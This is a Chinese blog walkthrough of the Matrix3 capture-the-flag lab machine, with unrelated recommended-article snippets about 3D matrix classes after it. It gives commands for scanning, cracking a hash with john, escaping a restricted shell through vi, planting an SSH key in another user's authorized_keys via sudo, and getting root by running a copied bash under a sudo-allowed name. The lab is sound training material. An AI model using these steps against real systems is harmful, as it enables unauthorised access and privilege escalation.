Matrix3

最新推荐文章于 2024-01-22 15:38:03 发布
最新推荐文章于 2024-01-22 15:38:03 发布
阅读量145 收藏
点赞数
文章标签: ssh 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47078547/article/details/131232812
版权

实验主机:matrix3 靶机一台/Kali linux攻击机一台

实验网络:桥接网络

实验目标:获取靶机的Root权限 得到flag

难易程度:难

一 部署环境

1:下载Virtualbox虚拟化软件

2:下载目标靶机 matrix3并导入Virtualbox

需要修改的内容

3:kal改成桥接

二 测试步骤

第一步:信息收集

步骤一:发现主机

arp-scan -l

步骤二:端口扫描

nmap -A -T4 -p- 192.168.3.142

访问7331端口 为登录窗口 但是没有密码

访问80端口

步骤三:页面提示查看兔子 打开兔子源码发现图片所在位置

步骤四:访问Matrix 发现很多目录 参考大佬文章访问neo64 下载文件直接读取

步骤五:md5解码得到登录名: admin 密码:passwd

步骤六:访问7331端口进行登录

步骤七:目录遍历 再data目录下发现data文件

dirb http://192.168.0.101:7331/ -u admin:passwd -w

步骤八:下载到本地查看文件类型 发现为windows下的可执行文件 但是未执行成功

file data

步骤九:破解 不会参考大佬操作

https://cloud.tencent.com/developer/article/1472396

破解
john aaa --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt
若是无法破解  就到/usr/share/wordlists这个目录下看rockyou.txt是否未解压,解压后可正常使用    #没用


得到  用户名 guest  密码  7R1n17yN30

第二步:漏洞利用 获取webshell

步骤一:利用得到的登录名:guest 密码:7R1n17yN30进行远程连接

ssh guest@192.168.0.101 -p 6464

步骤二:此用户只能使用很少部分的命令

第三步:权限提升

步骤一:调用/bin/sh 添加环境变量并且调用/usr/bin/bash

vi /bin/sh
进入编辑模式后直接输入以下命令
:!/bin/sh
export PATH=:/bin:/sbin:/usr/bin:/usr/sbin
/usr/bin/bash

步骤二:查看此用户可执行的命令 发现trinity可以无密码使用/bin/sh命令

步骤三:使用guest生成一个ssh密钥 保存到/home/guest/.ssh目录下

步骤四: 使用chmod命令为id_rsa.pub添加可执行权限,可以让trinity用户使用,使用trinity用户将生成的id_rsa.pub复制到trinity家目录下

chmod 777 .ssh
chmod 777 .ssh/id_rsa.pub 
ls -al .ssh/
sudo -u trinity /bin/cp .ssh/id_rsa.pub  /home/trinity/.ssh/authorized_keys

步骤五:远程登陆 用户名:trinity

发现可以以root用户权限无密码使用oracle命令,直接将/usr/bin/bash复制到trinity家目录下并改名为oracle

ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464

cp /usr/bin/bash oracle
chmod +x oracle 
ls -la

步骤七: 调用oracle,成功拥有root权限,在root目录下找到flag.txt文件

sudo ./oracle
cd /root/
cat flag.txt

Romantic Never Die
关注
Three 三维矩阵(Matrix3)、四维矩阵(Matrix4)
前端学习杂记,记录学习中的前端知识。
07-23 1388
将传入的欧拉角转换为该矩阵的旋转分量(左上角的3x3矩阵)。throwOnDegenerate - (optional) 如果设置为true,如果矩阵是退化的(如果不可逆的话),则会抛出一个错误。throwOnDegenerate - (optional) 如果设置为true,如果矩阵是退化的(如果不可逆的话),则会抛出一个错误。,如果throwOnDegenerate 参数没有设置且给定矩阵不可逆,那么将当前矩阵设置为3X3单位矩阵。把该矩阵设置为绕x轴旋转弧度theta (θ)大小的矩阵。
etcd教程(二)—clientv3简单使用
探索云原生
03-27 3544
本文主要介绍了etcd v3版本的基本使用,etcd v3版本入门教程,常见命令的简单使用。 1. 初始化Client cli, err := clientv3.New(clientv3.Config{ Endpoints: []string{"localhost:2379"}, DialTimeout:
Matrix:3
最新发布
zzf011900的博客
01-22 1087
使用 guest/7R1n17yN30 进行 ssh 登录得到,获得 bash ,不过是一个受限制的 bash ,rbash ( restriced bash ) ,使得一些基本的命令都无法执行。将secret.gz下载到本地,无法解压,再查看文件的类型是一个文本文件,ls查看文本内容发现登录用户和加密后的密码。查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容。直接在80端口,访问Matrix目录,发现可以打开,并发现很多目录。
Matrix3靶场
zjxxxy的博客
06-14 97
vulnhub靶场Matrix3攻略
Rotation Matrix 3D:3D旋转矩阵类-matlab开发
05-30
RotationMatrix 类允许处理具有不同参数化的 3D 旋转矩阵: -[3x3]旋转矩阵- 欧拉角- 指数图- 四元数一旦从上述参数化之一创建了 RotationMatrix 实例, 所有参数化都可以互换获得。 额外的静态方法允许在不创建实例...
Matrix3d图片视频坐标自动生成
06-01
总的来说,"Matrix3d图片视频坐标自动生成"项目展示了如何结合JavaScript、jQuery和CSS3的Matrix3d技术,为网页上的图片和视频元素创建动态的3D变换效果。通过理解这些技术,开发者可以创建出引人入胜的交互式网页,...
mat4-css-stringify:将 mat4 字符串化为 css matrix3d()
07-03
将 4x4 矩阵(存储在 16 个浮点平面数组中matrix3d()字符串化为matrix3d()字符串。 与结合使用很有用。 var stringify = require ( 'mat4-css-stringify' ) var parse = require ( 'mat4-css-parse' ) //get ...
tween-css-transform:补间 CSS 转换 (matrix3d)
07-02
使用 CSS matrix3d()和 4x4 矩阵插值(分解/重组)对 DOM 元素进行matrix3d() 。 这允许平滑范围的 3D 旋转(使用四元数和球面插值)而无需万向节锁定。 通常与或。 例子: var tweenr = require ( 'tweenr' ) ...
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 938
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Matrix 3
猎荒者
03-11 934
So I won’t hesitate No more no more It cannot wait 0x00 环境准备 Kali-Linux(IP:10.10.16.128) Matrix 3 虚拟机 NAT 网络连接 0x01 主机发现 nmap -sP 10.10.16.0/24 0x02 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.151 ...
maxscript matrix3的解释
chinaloft的博客
04-13 526
matrix3 <row1_point3> <row2_point3> <row3_point3> <row4_point3> 就是一个矩阵数据,存储物体的位置和变换信息,简单理解为,就是定义了物体4个点的位置坐标 matrix3 <X点位置> <Y点位置> <Z点位置> <0点位置> 就是一个很简单的数据存放类型 脚本运行,看结果 aa=$.transform prin...
Ogre矩阵Matrix3类和Matrix4类的成员方法
神秘代码
04-02 4133
Matrix3类3*3矩阵类。常量const Real Matrix3::EPSILON = 1e-06;    const Matrix3 Matrix3::ZERO(0,0,0,0,0,0,0,0,0);    const Matrix3 Matrix3::IDENTITY(1,0,0,0,1,0,0,0,1);    const Real Matrix3::m
three.js 源码注释(八)Math/Matrix3.js
omni360的专栏
10-27 2741
three.js 源码注释(八)Math/Matrix3.js ///Matrix3对象的构造函数.用来创建一个3x3矩阵.Matrix3对象的功能函数采用 ///定义构造的函数原型对象来实现,实际就是一个数组. /// /// 用法: var m = new Matrix3(11, 12, 13, 21, 22, 23, 31, 32, 33) /// 创建一个3x3的矩阵,其实就是一个长度为9的数组,将参数(11, 12, 13, 21, 22, 23, 31, 32, 33)传递给数组用来初始化.
3D数学基础:Matrix4×3类重点代码解析(一)
loongkingwhat的博客
08-30 2014
Matrix4×3矩阵和RotationMatrix矩阵是《3D数学基础》中的两大矩阵。相比于只能运用于旋转功能的RotationMatrix矩阵,Matrix 4×3矩阵更加一般化,能够支持更加复杂的变换。 该矩阵类及其实现的代码清单相对较长(完整的代码可以参看代码清单),不便于快速获取较重要的信息,下面对常用的API进行解析。 一、公共数据解析 该类描述的4*3的矩阵,上面3×3部分...
matrix3
Jerry_ICCAS的博客
10-10 442
//Writed by YaoPu, Oct 10,2016 //if any problem,send email yaopu@iccas.ac.cn //only for 2 processors !!!!! #include"mpi.h" #include int main(int argc,char **argv) { int rows=6,cols=5; int tag=0; MPI
3D数学 4x3矩阵类源代码(附中文注释)
梦幻DUO的游戏开发之路
10-31 2757
4x3矩阵类///////////////////////////////////////////////////////////////////////////// // // 3D数学基础:游戏与图形开发 // 3D Math Primer for Games and Graphics Development // // Matrix4x3.h - Matrix4x3类声明 // Matrix4
Matrix3f转Matrix4f
06-08
要将 `Eigen::Matrix3f` 类型的矩阵转换为 `Eigen::Matrix4f` 类型的矩阵,可以使用 `Eigen::Matrix4f::Identity()` 函数生成一个 4x4 的单位矩阵,并将 `Eigen::Matrix3f` 类型的矩阵复制到 `Eigen::Matrix4f` 类型...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值